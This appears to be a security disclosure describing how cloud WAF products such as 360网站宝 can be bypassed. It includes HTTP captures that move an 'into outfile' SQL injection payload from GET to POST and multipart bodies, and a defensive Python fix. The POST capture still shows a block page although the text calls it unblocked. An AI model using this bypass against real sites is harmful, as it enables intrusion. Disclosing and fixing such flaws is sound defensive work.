
Protection bypass in 360网站宝, 安全宝, 加速乐 and other similar products

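Cloud WAF products such as 360网站宝 have an implementation problem that allows their security policy to be bypassed.

When handling GET requests they all recognize the attack, but once the request is switched to POST, or to a modified POST, the attack is no longer recognized.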

 

GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778

HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:21:35 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn

[Response body: the 网站卫士 block page, <title>禁止访问</title> ("Access denied"), with the message "您提交的请求存在危险内容,已被网站卫士拦截!" ("Your request contains dangerous content and has been blocked by 网站卫士"); page styles and scripts omitted]

Change it to:

POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1
Host: www.xiangshu.com
Connection: keep-alive
Content-Length: 1778

HTTP/1.1 493
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:22:04 GMT
Content-Type: text/html
Content-Length: 5538
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn

[Response body: the 网站卫士 block page, <title>禁止访问</title> ("Access denied"), with the message "您提交的请求存在危险内容,已被网站卫士拦截!" ("Your request contains dangerous content and has been blocked by 网站卫士"); page styles and scripts omitted]

and it is not blocked.

If it is still blocked, switch to the file-upload form:

------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7
Content-Disposition: form-data; name="folder"

/blog/
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7
Content-Disposition: form-data; name="id"

1%20into%20outfile%20'/tmp/abc'

HTTP/1.1 200 OK
Server: nginx/1.2.9
Date: Thu, 28 Nov 2013 12:22:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
X-Powered-By: PHP /5.2.13
Content-Length: 6258

[Response body: the normal page of www.xiangshu.com rather than the block page; HTML omitted]

and then it is no longer blocked.
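The fix on the WAF side is to inspect the same parameters the backend will read, whatever the method or body encoding. The following is an added example, not code from the original post or from any of the products named: `naive_inspect` is an assumed model of the method-dependent check described above, `inspect` is the method-independent version, and the rule, function names and multipart boundary are constructed for illustration.

```python
import re
from email.parser import BytesParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Toy rule for the payload shown on this page; real rule sets are far larger.
RULE = re.compile(r"\binto\s+outfile\b", re.IGNORECASE)

def collect_params(target, content_type="", body=b""):
    """Gather (name, value) pairs from every place the backend reads input."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    ctype = content_type.lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    elif ctype.startswith("multipart/form-data"):
        # Reuse the stdlib MIME parser: prepend the header carrying the boundary.
        raw = b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body
        for part in BytesParser().parsebytes(raw).walk():
            if not part.is_multipart():  # an unparsable body is kept as one raw value
                name = part.get_param("name", "", "content-disposition")
                params.append((name, part.get_payload(decode=True).decode("latin-1")))
    return params

def naive_inspect(method, target, content_type="", body=b""):
    """Assumed model of the flaw: only the query string of GET requests is checked."""
    if method != "GET":
        return False
    return any(RULE.search(v) for _, v in parse_qsl(urlsplit(target).query))

def inspect(method, target, content_type="", body=b""):
    """Method-independent check; also tests a further percent-decoding of each value."""
    return any(RULE.search(v) or RULE.search(unquote(v))
               for _, v in collect_params(target, content_type, body))

# Constructed sample requests modelled on the three captures above.
TARGET = "/index.php?id=1%20into%20outfile%20'/tmp/abc'"
MP_TYPE = "multipart/form-data; boundary=XBOUNDARY"  # constructed boundary
MP_BODY = (b"--XBOUNDARY\r\n"
           b'Content-Disposition: form-data; name="folder"\r\n\r\n/blog/\r\n'
           b"--XBOUNDARY\r\n"
           b'Content-Disposition: form-data; name="id"\r\n\r\n'
           b"1%20into%20outfile%20'/tmp/abc'\r\n"
           b"--XBOUNDARY--\r\n")

def demo():
    """Return (naive, hardened) verdicts for GET, POST and multipart POST."""
    cases = [("GET", TARGET), ("POST", TARGET), ("POST", "/index.php", MP_TYPE, MP_BODY)]
    return [(naive_inspect(*c), inspect(*c)) for c in cases]

if __name__ == "__main__":
    print(demo())
```

The hardened check flags all three requests, while the naive one flags only the GET.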

 
